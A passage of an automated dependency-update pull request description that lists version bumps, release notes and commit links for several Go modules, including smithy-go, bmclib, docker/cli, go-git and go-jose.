href=\"https://github.com/aws/etcdadm-controller/commit/d4476151cb03c0d699e5426632ff76a243ff0124\"\u003e\u003ccode\u003ed447615\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcadm controller (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-controller/compare/v1.0.25...v1.0.27\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.20.3 to 1.24.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/releases\"\u003egithub.com/aws/smithy-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/b860661df961e236ca154f5a66e1f01216639738\"\u003e\u003ccode\u003eb860661\u003c/code\u003e\u003c/a\u003e Release 2026-02-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/567846b9a9de2906faffe420719177aece913452\"\u003e\u003ccode\u003e567846b\u003c/code\u003e\u003c/a\u003e Bump minimun Go version to 1.24 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/629\"\u003e#629\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/8c6355875a5c602fa6c2d9093e2b46e69e4d38f4\"\u003e\u003ccode\u003e8c63558\u003c/code\u003e\u003c/a\u003e Release 2026-02-20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/c6d1144762205b31f9d511b1525eb67b0c4c1e4c\"\u003e\u003ccode\u003ec6d1144\u003c/code\u003e\u003c/a\u003e Create new event stream generator (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/626\"\u003e#626\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/f82babd3fee1cc95f6974716ba570c1d4f72e8a1\"\u003e\u003ccode\u003ef82babd\u003c/code\u003e\u003c/a\u003e update Smithy version to 1.67.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/627\"\u003e#627\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/708bee3fd23f247fe0b019ae3fbb9dd7837117bc\"\u003e\u003ccode\u003e708bee3\u003c/code\u003e\u003c/a\u003e move writable and chainwritable up (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/622\"\u003e#622\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/7bfe108d0fa9790e554d201e80faa6b8051569d0\"\u003e\u003ccode\u003e7bfe108\u003c/code\u003e\u003c/a\u003e Add support for OrExpression JMESPath (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/9dbc5b22fed45a861a3782db7642bec232c5b0b3\"\u003e\u003ccode\u003e9dbc5b2\u003c/code\u003e\u003c/a\u003e bump smithy to v1.64.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/71f5bff362491399f8a2cca586c5802eb5a66d70\"\u003e\u003ccode\u003e71f5bff\u003c/code\u003e\u003c/a\u003e Release 2025-12-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/c94c177cfcf46095d48a88253899242f5971ae1b\"\u003e\u003ccode\u003ec94c177\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.20.3...v1.24.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bmc-toolbox/bmclib/v2` from 2.1.1-0.20231206130132-1063371b9ed6 to 2.3.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bmc-toolbox/bmclib/releases\"\u003egithub.com/bmc-toolbox/bmclib/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.3.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SetBiosFromFile by \u003ca href=\"https://github.com/jakeschuurmans\"\u003e\u003ccode\u003e@​jakeschuurmans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/403\"\u003ebmc-toolbox/bmclib#403\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(mergify): upgrade configuration to current format by \u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix media mounting eject implementation: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/406\"\u003ebmc-toolbox/bmclib#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump golang.org/x/crypto from 0.23.0 to 0.31.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNil pointer safety by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/408\"\u003ebmc-toolbox/bmclib#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/409\"\u003ebmc-toolbox/bmclib#409\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate virtual media ejecting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/410\"\u003ebmc-toolbox/bmclib#410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnables support for supermicro x11ssl-f and x11scz-f by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/411\"\u003ebmc-toolbox/bmclib#411\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove virtual media ejecting and inserting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/412\"\u003ebmc-toolbox/bmclib#412\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved power state limitations from RPC provider by \u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCheck power state before issuing power off for ipmi: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/417\"\u003ebmc-toolbox/bmclib#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove sshclient package: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/420\"\u003ebmc-toolbox/bmclib#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mergify configuration issue: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/425\"\u003ebmc-toolbox/bmclib#425\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use all systems when no match is found: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/422\"\u003ebmc-toolbox/bmclib#422\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Redfish] Add support for UefiHttp boot by \u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eadd \u0026quot;homeassistant\u0026quot; provider by \u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(intelamt): implement Closer interface correctly by \u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdds BMC, BIOS firmware install support for Supermicro X11SSL-F by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/431\"\u003ebmc-toolbox/bmclib#431\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: fall back to System path for VirtualMedia discovery by \u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: make SetVirtualMedia fall back on failure by \u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow specifying the Redfish system name: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/400\"\u003ebmc-toolbox/bmclib#400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate redfish system name matching by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/401\"\u003ebmc-toolbox/bmclib#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eproviders/supermicro/supermicro.go: Initialize sum 'client' during serviceclient init by \u003ca href=\"https://github.com/splaspood\"\u003e\u003ccode\u003e@​splaspood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/402\"\u003ebmc-toolbox/bmclib#402\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate virtual media mounting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/398\"\u003ebmc-toolbox/bmclib#398\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eexpand response payload processing by \u003ca href=\"https://github.com/DoctorVin\"\u003e\u003ccode\u003e@​DoctorVin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/399\"\u003ebmc-toolbox/bmclib#399\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bmc-toolbox/bmclib/commits/v2.3.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/docker/cli` from 29.2.0+incompatible to 29.3.1+incompatible\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/c2be9ccfc3cf0b4c4c4f0a3d5c91dd759ab21256\"\u003e\u003ccode\u003ec2be9cc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6887\"\u003e#6887\u003c/a\u003e from thaJeztah/29.x_backport_pin_actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/0da6a5121f81387dc7eeba18f928c7e6f3d5cd9d\"\u003e\u003ccode\u003e0da6a51\u003c/code\u003e\u003c/a\u003e ci: pin actions to digests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/6b3ca8fc04d2c5615735f87c41b98d331a0d9fe7\"\u003e\u003ccode\u003e6b3ca8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6884\"\u003e#6884\u003c/a\u003e from thaJeztah/29.x_backport_missing_buildtags\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/f47603c2903fcf5c7e7d8734e5bbc0ecdc04efaf\"\u003e\u003ccode\u003ef47603c\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6885\"\u003e#6885\u003c/a\u003e from thaJeztah/29.x_backport_update_actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/9709c8fe08f902f0aa41ffffaa00085ab39aecd8\"\u003e\u003ccode\u003e9709c8f\u003c/code\u003e\u003c/a\u003e build(deps): bump docker/metadata-action from 5 to 6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/af45a23fa9a06cb282294054d213b9b0fbae1ac7\"\u003e\u003ccode\u003eaf45a23\u003c/code\u003e\u003c/a\u003e build(deps): bump docker/bake-action from 6 to 7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/bc97f5ac196f4633ffe360cfa2ab831e94dfc6f8\"\u003e\u003ccode\u003ebc97f5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6883\"\u003e#6883\u003c/a\u003e from thaJeztah/29.x_backport_update_go1.25.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/6d71967120b4cdbb556211c7a2514c42dcb2e582\"\u003e\u003ccode\u003e6d71967\u003c/code\u003e\u003c/a\u003e cli/command: add missing \u0026quot;go:build\u0026quot; comments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/9b51892b8061ff03e91e8aad41e86cad21057272\"\u003e\u003ccode\u003e9b51892\u003c/code\u003e\u003c/a\u003e update to go1.25.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/5927d80c76b3ce5cf782be818922966e8a0d87a3\"\u003e\u003ccode\u003e5927d80\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6844\"\u003e#6844\u003c/a\u003e from vvoland/update-docker\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/docker/cli/compare/v29.2.0...v29.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.17.1 to 5.17.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.17.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1941\"\u003ego-git/go-git#1941\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edotgit: skip writing pack files that already exist on disk by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1944\"\u003ego-git/go-git#1944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e:warning: This release fixes a bug (\u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1942\"\u003ego-git/go-git#1942\u003c/a\u003e) that blocked some users from upgrading to \u003ccode\u003ev5.17.1\u003c/code\u003e. Thanks \u003ca href=\"https://github.com/pskrbasu\"\u003e\u003ccode\u003e@​pskrbasu\u003c/code\u003e\u003c/a\u003e for reporting it. :bow:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/45ae193b3a60aa8ec8a3e373f7265a7819473d5f\"\u003e\u003ccode\u003e45ae193\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1944\"\u003e#1944\u003c/a\u003e from go-git/fix-perms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/fda4f7464b597ff33d2dea1c026482a5e900037c\"\u003e\u003ccode\u003efda4f74\u003c/code\u003e\u003c/a\u003e storage: filesystem/dotgit, Skip writing pack files that already exist on disk\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/2212dc7caeb2a389fe2129923811ef63f75a557a\"\u003e\u003ccode\u003e2212dc7\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1941\"\u003e#1941\u003c/a\u003e from go-git/renovate/releases/v5.x-go-github.com-go-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/ebb2d7da7f5d5aebeaa0b5e13276d72d602c1ae3\"\u003e\u003ccode\u003eebb2d7d\u003c/code\u003e\u003c/a\u003e build: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY]\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-jose/go-jose/v3` from 3.0.4 to 3.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-jose/go-jose/releases\"\u003egithub.com/go-jose/go-jose/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.0.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\"\u003ehttps://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe recommend migrating from v3 to v4, and we will stop support v3 in the near future.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ehttps://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/be2f6548701d4ba561cd61c7d4a2f1289b66c273\"\u003e\u003ccode\u003ebe2f654\u003c/code\u003e\u003c/a\u003e ci: update Go versions for GHA workflows (\u003ca href=\"https://redirect.github.com/go-jose/go-jose/issues/221\"\u003e#221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/02464163e1e891db85257cb8860978a1c0226016\"\u003e\u003ccode\u003e0246416\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/nutanix-cloud-native/prism-go-client` from 0.3.4 to 0.7.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/releases\"\u003egithub.com/nutanix-cloud-native/prism-go-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 